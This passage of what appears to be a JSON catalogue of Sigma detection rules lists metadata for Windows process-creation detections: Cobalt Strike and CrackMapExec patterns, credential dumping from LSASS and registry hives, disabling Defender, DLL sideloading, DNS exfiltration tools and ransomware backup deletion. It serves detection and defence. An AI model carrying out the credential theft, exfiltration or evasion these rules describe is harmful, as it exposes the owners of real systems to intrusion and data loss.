"proc_creation_win_cobaltstrike_load_by_rundll32.yml", - "author": "Wojciech Lesicki", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "uuid": "f35c5d71-b489-4e22-a115-f003df287317", - "value": "CobaltStrike Process Patterns", - "meta": { - "refs": [ - "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" - ], - "tags": [ - "attack.execution", - 
"attack.t1059" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", - "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", - "value": "Cmd.exe CommandLine Path Traversal", - "meta": { - "refs": [ - "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", - "https://twitter.com/Oddvarmoe/status/1270633613449723905", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2020/06/11", - "filename": "proc_creation_win_commandline_path_traversal.yml", - "author": "xknow @xknow_infosec, Tim Shelton", - "level": "high", - "falsepositive": [ - "(not much) some benign Java tools may product false-positive commandlines for loading libraries" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "value": "Command Line Path Traversal Evasion", - "meta": { - "refs": [ - "https://twitter.com/hexacorn/status/1448037865435320323", - "https://twitter.com/Gal_B1t/status/1062971006078345217", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2021/10/26", - "filename": 
"proc_creation_win_commandline_path_traversal_evasion.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Google Drive", - "Citrix" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "uuid": "435e10e4-992a-4281-96f3-38b11106adde", - "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/11/10", - "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", - "value": "Conhost.exe CommandLine Path Traversal", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" - ], 
- "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_conhost_path_traversal.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Conti ransomware command line ioc", - "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", - "value": "Conti Ransomware Execution", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" - ], - "creation_date": "2021/10/12", - "filename": "proc_creation_win_conti_cmd_ransomware.yml", - "author": "frack113", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to dump database", - "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", - "value": "Conti Backup Database", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/08/16", - "filename": "proc_creation_win_conti_sqlcmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the malicious use of a control panel item", - "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", - "value": "Control Panel Items", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1196/", - "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2020/06/22", - "filename": "proc_creation_win_control_panel_item.yml", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "value": "Copying Sensitive Files with Credential Data", - "meta": { - "refs": [ - "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "high", - 
"falsepositive": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", - "uuid": "044ba588-dff4-4918-9808-3f95e8160606", - "value": "Copy DMP Files From Share", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_copy_dmp_from_share.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", - "value": "CrackMapExec Process Patterns", - "meta": { - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/03/12", - "filename": "proc_creation_win_crackmapexec_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "value": "Node Process Executions", - "meta": { - "refs": [ - 
"https://twitter.com/mttaggart/status/1511804863293784064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" - ], - "creation_date": "2022/04/06", - "filename": "proc_creation_win_creative_cloud_node_abuse.yml", - "author": "Max Altgelt", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", - "value": "Dropping Of Password Filter DLL", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", - "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "creation_date": "2020/10/29", - "filename": "proc_creation_win_credential_access_via_password_filter.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Credential Acquisition via Registry Hive Dumping", - "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", - "value": "Credential Acquisition via Registry Hive Dumping", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": 
"2022/10/04", - "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Archer malware invocation via rundll32", - "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "value": "Fireball Archer Install", - "meta": { - "refs": [ - "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", - "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2017/06/03", - "filename": "proc_creation_win_crime_fireball.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "value": "Maze Ransomware", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", - "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2020/05/08", - "filename": "proc_creation_win_crime_maze_ransomware.yml", - 
"author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", - "value": "Snatch Ransomware", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2020/08/26", - "filename": "proc_creation_win_crime_snatch_ransomware.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "value": "Windows Crypto Mining Indicators", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ], - "creation_date": "2021/10/26", - "filename": "proc_creation_win_crypto_mining_monero.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners", - "Some build frameworks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", - "uuid": 
"bbeaed61-1990-4773-bf57-b81dbad7db2d", - "value": "Curl Usage on Windows", - "meta": { - "refs": [ - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_win_curl_download.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "value": "CVE-2021-26857 Exchange Exploitation", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "value": "Data Compressed - rar.exe", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_data_compressed_with_rar.yml", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", - "level": "low", - "falsepositive": [ - "Highly likely if rar is a default archiver in the monitored environment." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", - "value": "Wbadmin Delete Systemstatebackup", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_delete_systemstatebackup.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program 
Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", - "uuid": "4e762605-34a8-406d-b72e-c1a089313320", - "value": "Detecting Fake Instances Of Hxtsr.exe", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2020/04/17", - "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". 
\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", - "value": "DLL Sideloading via DeviceEnroller.exe", - "meta": { - "refs": [ - "https://mobile.twitter.com/0gtweet/status/1564131230941122561", - "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/29", - "filename": "proc_creation_win_deviceenroller_evasion.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "value": "DInject PowerShell Cradle CommandLine Flags", - "meta": { - "refs": [ - "https://github.com/snovvcrash/DInjector", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_dinjector.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of DirLister.exe", - "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", - "value": "Launch DirLister Executable", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" - ], - 
"tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_dirlister.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", - "value": "Disable Windows Defender AV Security Monitoring", - "meta": { - "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", - "author": "ok @securonix invrep-de, oscd.community, frack113", - "level": "high", - "falsepositive": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", - "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "value": "Sc Or Set-Service Cmdlet Execution to Disable Services", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_disable_service.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrators settings a service to disable via script or cli for testing purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "value": "Discover Private Keys", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2021/07/20", - "filename": "proc_creation_win_discover_private_keys.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the 
non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "value": "DLL Sideloading by Microsoft Defender", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_dll_sideload_defender.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", - "value": "DLL Sideloading by VMware Xfer Utility", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. 
Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", - "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", - "value": "DNSCat2 Powershell Implementation Detection Via Process Creation", - "meta": { - "refs": [ - "https://github.com/lukebaggett/dnscat2-powershell", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071", - "attack.t1071.004", - "attack.t1001.003", - "attack.t1041" - ], - "creation_date": "2020/08/08", - "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Other powershell scripts that call nslookup.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", - "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "value": "Discovery/Execution via dnscmd.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", - "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" - ], - "creation_date": "2022/07/31", - "filename": "proc_creation_win_dnscmd_discovery.yml", - "author": 
"@gott_cyber", - "level": "medium", - "falsepositive": [ - "Legitimate administration use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Well-known DNS Exfiltration tools execution", - "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "value": "DNS Exfiltration and Tunneling Tools Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate usage of iodine or dnscat2 \u2014 DNS Exfiltration tools (unlikely)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "value": "DNS ServerLevelPluginDll Install", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "creation_date": "2017/05/08", - "filename": "proc_creation_win_dns_serverlevelplugindll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "dotnet.exe will execute any DLL and 
